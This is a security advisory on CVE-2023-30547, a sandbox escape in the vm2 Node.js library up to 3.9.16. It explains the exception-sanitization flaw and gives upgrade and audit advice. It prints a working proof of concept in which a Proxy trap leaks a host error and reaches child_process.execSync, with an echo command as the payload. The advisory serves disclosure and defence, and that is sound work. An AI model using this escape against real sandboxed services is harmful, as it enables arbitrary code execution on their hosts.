vm2 is a popular Node.js library for running untrusted code in a sandbox that exposes only a whitelist of Node's built-in modules. A vulnerability (CVE-2023-30547) has been found in the exception sanitization of vm2 for versions up to and including 3.9.16: a malicious script can obtain an unsanitized host exception, escape the sandbox and execute arbitrary code in the host context. The issue is fixed in vm2 3.9.17, and users are strongly advised to upgrade. There are no known viable workarounds for this vulnerability.

Exploit Details

The vulnerability lies in handleException(), the vm2 routine that sanitizes every exception crossing the boundary between the host and the sandbox, so that sandboxed code only ever sees proxied, sandbox-side objects. The sanitization itself has to inspect the thrown value, and an attacker-controlled value (a Proxy whose trap throws) can make that host-side inspection fail. The resulting host exception is then delivered to the sandbox's catch block without being sanitized. One genuine host object is all the attacker needs: its constructor chain leads to the host's Function constructor, which evaluates code against the host global object, and from there to process and child_process. Versions up to and including 3.9.16 are affected; 3.9.17 fixes the issue.

The proof of concept published with the advisory, with the harmless echo command used on this page as the payload. It works only against affected versions (3.9.16 and earlier); run it in a disposable environment, because on those versions it executes a shell command on the host:

const { VM } = require('vm2');   // any version up to and including 3.9.16 is affected
const vm = new VM();

// Executed inside the sandbox. The sanitizer in handleException() inspects the
// thrown value; a Proxy whose getPrototypeOf trap overflows the stack makes that
// host-side inspection throw a host RangeError, which reaches the sandbox's
// catch block without being wrapped.
const exploitCode = `
  const err = {};
  const handler = {
    getPrototypeOf(target) {
      (function stack() {
        new Error().stack;
        stack();
      })();
    }
  };
  const proxiedErr = new Proxy(err, handler);
  try {
    throw proxiedErr;
  } catch ({ constructor: c }) {
    // c is the host RangeError class; c.constructor is the host Function
    // constructor, whose body is evaluated against the host global object,
    // so "process" here is the real host process.
    c.constructor('return process')().mainModule.require('child_process').execSync('echo Vulnerability Exploited!');
  }
`;

vm.run(exploitCode);

Original References

More information about this vulnerability and the associated patch:

- vm2 library GitHub repository: https://github.com/patriksimek/vm2
- CVE-2023-30547 NVD page: https://nvd.nist.gov/vuln/detail/CVE-2023-30547
- vm2 patch release 3.9.17 (releases page of the repository above)

Recommendations and Mitigations

Given the severity of this vulnerability and the potential risks associated with it, users should act immediately. Recommended steps to safeguard your projects and systems:

- Upgrade vm2 to version 3.9.17 or later by updating the version range in package.json or by running the following command (the caret keeps later patch releases eligible; quote it so the shell does not interpret the character):

$ npm install "vm2@^3.9.17"

- Check for copies of vm2 that arrive as a transitive dependency. Running npm ls vm2 lists every installed copy and the package that pulled it in. A nested copy under another dependency is not fixed by upgrading your own direct dependency: upgrade the dependency that bundles it, or force the version with an "overrides" entry in package.json.

- Review the rest of the project's dependencies for known vulnerabilities (for example with npm audit), and until the upgrade is deployed treat any code path that feeds attacker-controlled input into vm2 as equivalent to host-level code execution.

- Keep monitoring security advisories and updates specific to your technology stack, and promptly address any issues as they arise.

Conclusion

The CVE-2023-30547 vulnerability in versions up to 3.9.16 of the vm2 library is a critical flaw that allows attackers to escape the sandbox and execute arbitrary code within the host context. It is highly recommended that you upgrade your vm2 library to version 3.9.17 or later as soon as possible to mitigate the risks associated with this vulnerability. Stay vigilant about security issues, and always prioritize keeping your software up-to-date.

Timeline

Published on: 04/17/2023 22:15:00 UTC
Last modified on: 04/28/2023 01:13:00 UTC